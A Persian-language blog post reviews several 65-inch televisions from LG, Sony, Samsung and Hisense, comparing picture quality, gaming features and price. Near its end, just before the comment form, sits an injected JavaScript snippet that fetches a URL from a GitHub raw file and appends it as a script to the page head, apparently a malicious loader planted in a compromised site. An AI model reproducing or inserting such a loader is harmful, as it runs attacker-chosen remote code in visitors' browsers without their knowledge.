دسته‌بندی نشده

معرفی بهترین تلویزیون های 65 اینچ

اگر از افرادی هستید که در فاصله دوری از تلویزیون می نشینید و یا به دنبال یک تلویزیون بزرگ برای خانه خود هستید تلویزیون های 65 اینچ بهترین انتخاب ممکن برای شما می باشد. این تلویزیون ها ابتدا با قیمت بسیار زیاد و هنگفتی وارد بازار شدند به صورتی که تعداد کمی از افراد می توانستند ان ها را خریداری کنند اما با تولید بیشتر و عرضه تلویزیون های بیشتری در این سایز قیمت ان ها نیز به صورت چشمگیری کاهش یافت. امروزه بیشتر مدل ها در اندازه 65 اینچ نیز تولید می شوند بنابراین انتخاب یک تلویزیون مناسب در این اندازه برای کاربران کاری دشوار و انتخابی سخت است. در این مقاله به بررسی بهترین تلویزیون 65 اینچ از برند های مختلف با در نظر گرفتن فاکتور های متعدد خواهیم پرداخت. 

اولین و بهترین گذینه در این لیست به کمپانی ال جی LG مدل C1 تعلق می گیرد. 

بهترین تلویزیون 65 اینچ که با پنل اولد OLED عرضه شده است از کمپانی ال جی مدل OLED65C1PUB است. این تلویزیون یک مدل فوق العاده با عملکردی ممتاز است و تصاویری با کیفیت و کوالتی عالی را مخصوصا در اتاق های تاریک عرضه می کند. این تلویزیون دارای ویژگی های عالی و منحصر به فرد مانند مانند ورودی HDMI 2.1 و نرخ نوسازی متغیر VRR می باشد بنابراین در بازی ها عملکردی مناسب دارد و می تواند بسیار مناسب و جذاب برای گیمر ها باشد. وجود قابلیت های اسمارت با بکارگیری پلتفرم WebOS و وجود میلیون ها اپلیکیشن مختلف با قابلیت دانلود و نصب روی تلویزیون ویژگی عالی و قابلیت ممتاز برای ان می باشد. ویژگی های مختلف و امکانات موجود در این تلویزیون ال جی را می توانید در مقاله مربوطه در این لینک مشاهده فرمایید.

گذینه دیگر مورد بررسی در این لیست تلویزیون 65 اینچ سونی مدل XR-65A90J است.


این تلویزیون بسیار کاربردی و فوق العاده برای تماشا فیلم می باشد. اگر از افرادی هستید که به تماشا فیلم علاقه دارید و فیلم دیدن از سرگرمی های روزانه شما می باشد تلویزیون اولد OLED سونی مدل A90J موردی مناسب برای شما می باشد. این تلویزیون هیچگونه ویژگی های مناسب و کاربردی برای گیمر ها و انجام بازی ندارد. برای این تلویزیون سونی از پنل OLED متفاوتی استفاده شده است که روشنایی بسیار بیشتری مخصوصا در حالت HDR دارد. این تلویزیون پردازنده تصویر بسیار قوی و قدرتمندی دارد اگرچه دقت ان دربین واحد های مختلف ان متفاوت است اما تلویزیون های سونی در کل به دقت و وضوح بالای خود معروف اند. اگر به دنبال یک تلویزیون 65 اینچ از سری OLED می باشد تلویزیون C1 ال جی را می توانید برای انجام بازی ها مختلف و تلویزیون A90J را برای تماشا فیلم های مختلف استفاده و بکار ببرید. 

تلویزیون سامسونگ مدل 65QN90A یک تلویزیون عالی 65 اینچ از سری LED می باشد. 

تلویزیون 65 اینچ سامسونگ فورکی 4K مدل QN90 ی محصول با نور پس زمینه LED می باشد. تلویزیون QN65QN90AAFXZA کنتراستی بالا را با تعبیه نور های پس زمینه mini LED فراهم خواهد کرد. تکنولوژی پس زمینه ارتقا یافته این تلویزیون سامسونگ روشنایی ان را به مرحله جدیدی می رساند و کنترل بهتری را روی نور قسمت های مختلف ایجاد خواهد کرد. این تلویزیون سامسونگ با استفاده از پنل VA روشنایی و سطح کنتراست خوبی را برای محتویات تاریک ایجاد می کند و همچنین با وجود پاسخ دهی سریع و تاخیر ورودی کم و بهره گیری از ورودی HDMI 2.1 گذینه فوق العاده ای برای انجام بازی های مختلف 4K می باشد. 

تلویزیون هایسنس مدل 65U8G از گذینه های مناسب این لیست از نظر قیمت پایین و مناسب می باشد.

اگر به دنبال یک تلویزیون با قیمت پایین هستید می توانید تلویزیون 65 اینچ هایسنس U8G را در نظر داشته باشید. این تلویزیون دارای سیستم نور پس زمینه ساده تر و زاویه دید کم تری نسبت به تلویزیون QN90A سامسونگ است اما به دلیل قیمت پایینی که دارد تلویزیون با ارزش و بصرفه محسوب می شود. بر روی نمایشگر رنگ ها مشکی یکنواخت و کنتراست بسیار بالا پخش می شود. محتویات در محیط های پر نور بر روی این تلویزیون با وضوح بالا دیده می شوند. پالت رنگی گسترده و محتویات HDR با روشنایی و دقت بالا ارائه می شوند. تلویزیون 65U8G در انجام بازی های نیز عملکردی خوب دارد و فقط در مسائل کوچک و جزئی دچار مشکل و ایراد خواهد شد. اگر تلویزیون با پنل LED نیاز دارد و مشکلی با قیمت بالا نخواهید داشت تلویزیون سامسونگ گذینه مناسبی است اما اگر یک گذینه با قیمت پایین تر در نظر دارید می توانید تلویزیون هایسنس را برای خانه خود خریداری کنید. 

از دیگر گذینه های مناسب از نظر قیمت در این لیست تلویزیون 65 اینچ هایسنس مدل 65U6G است. 

در دسته بندی تلویزیون های قیمت مناسب برند هایسنس مدل U6G گذینه ای مناسب و عالی محسوب می شود. این تلویزیون می تواند افراد زیادی را راضی و خشنود کند و همچنین می تواند کیفیت تصویر عالی را روی نمایشگر پخش کند. این تلویزیون دارای سیستم عامل اندروید است و قابلیت های هوشمند مختلف با اپلیکیشن های گوناگون قابل دانلود را عرضه می کند. این تلویزیون بهترین گذینه برای تماشا فیلم در محیط ای تاریک است و هیچ مشکلی در ارتقا کیفیت های پایین در ان دیده نخواهد شد. فرمت های مختلف HDR مانند HDR10+ و Dolby Vision روی این نمایشگر پشتیبانی می شود و همچنین رنج گسترده ای از رنگ ها روی ان قابل پخش می باشد. از نظر بازی نیز به دلیل پاسخگویی سریع و تاخیر ورودی پایین این تلویزیون 65 اینچ می تواند گذینه مناسب اما نه چندان عالی باشد. 

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *